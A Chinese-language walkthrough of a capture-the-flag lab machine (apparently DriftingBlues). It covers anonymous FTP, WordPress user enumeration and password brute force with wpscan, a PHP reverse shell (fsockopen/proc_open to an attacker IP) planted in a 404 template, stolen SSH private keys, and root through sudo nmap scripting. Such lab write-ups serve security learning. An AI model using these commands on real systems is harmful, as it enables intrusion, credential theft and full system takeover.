(tmd,配置个网卡配置半天)

还是先扫一下c段

image-20230421165628676

然后进行端口扫描

image-20230421170024112

扫描发现了三个端口 多出来的21端口是ftp服务,那么我们就可以去尝试一下,看能不能匿名登录

1
2
3
ftp 192.168.142.142
用户名:anonymous
密码:空

image-20230421170215786

成功进行登录

里面只有一张图片,没啥用,然后进行端口扫描

image-20230421170728331

image-20230421170744040

只访问这个blog的话是wordpress框架的

然后尝试进行使用该框架的扫描工具 wpscan进行扫描

1
wpscan --url http://192.168.142.142/blog/ -e u

image-20230421171032382

扫到一个用户 于是尝试进行密码破解

1
wpscan --url http://192.168.142.142/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert

image-20230421171505615

爆破到密码了

image-20230421171908888

扫到后台了,于是尝试进行登录

image-20230421172047872

得先进行域名的dns配置好

image-20230421172231456

进行修改成功

image-20230421172249279

image-20230421172328984

成功进入后台,那么我们就得寻找可以进行漏洞利用的地方了

img

这就是漏洞利用的点

修改后的代码

1
2
3
4
5
6
7
8
9
10
$ip="192.168.142.129";
$port=3333;
$sock=fsockopen($ip, $port);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

image-20230421173119250

1
http://driftingblues.box/blog/index.php/xxx

然后访问一个不存在的页面,就可以直接弹shell了

image-20230421173724289

1
使用命令:python -c 'import pty; pty.spawn("/bin/bash")'

然后尝试进行提权

进入/home/freddie后发现存在.ssh文件

image-20230421173917976

image-20230421174018099

发现存在私钥和公钥

那么我们就可以尝试进行ssh私钥登录

image-20230421175335627

把私钥进行复制过来,然后给权限,然后进行私钥登录

image-20230421175515512

直接进行私钥登录了

image-20230421175554303

拿到第一个flag

image-20230421175631172

猜测是用namp进行提权,用的是script来运行脚本

1
2
echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell

image-20230421175735156

然后就变成了root用户了

image-20230421175816747

拿到了全部的flag了

总结

这次出现了21 端口匿名登入以及ssh 私钥登入 (新知识点)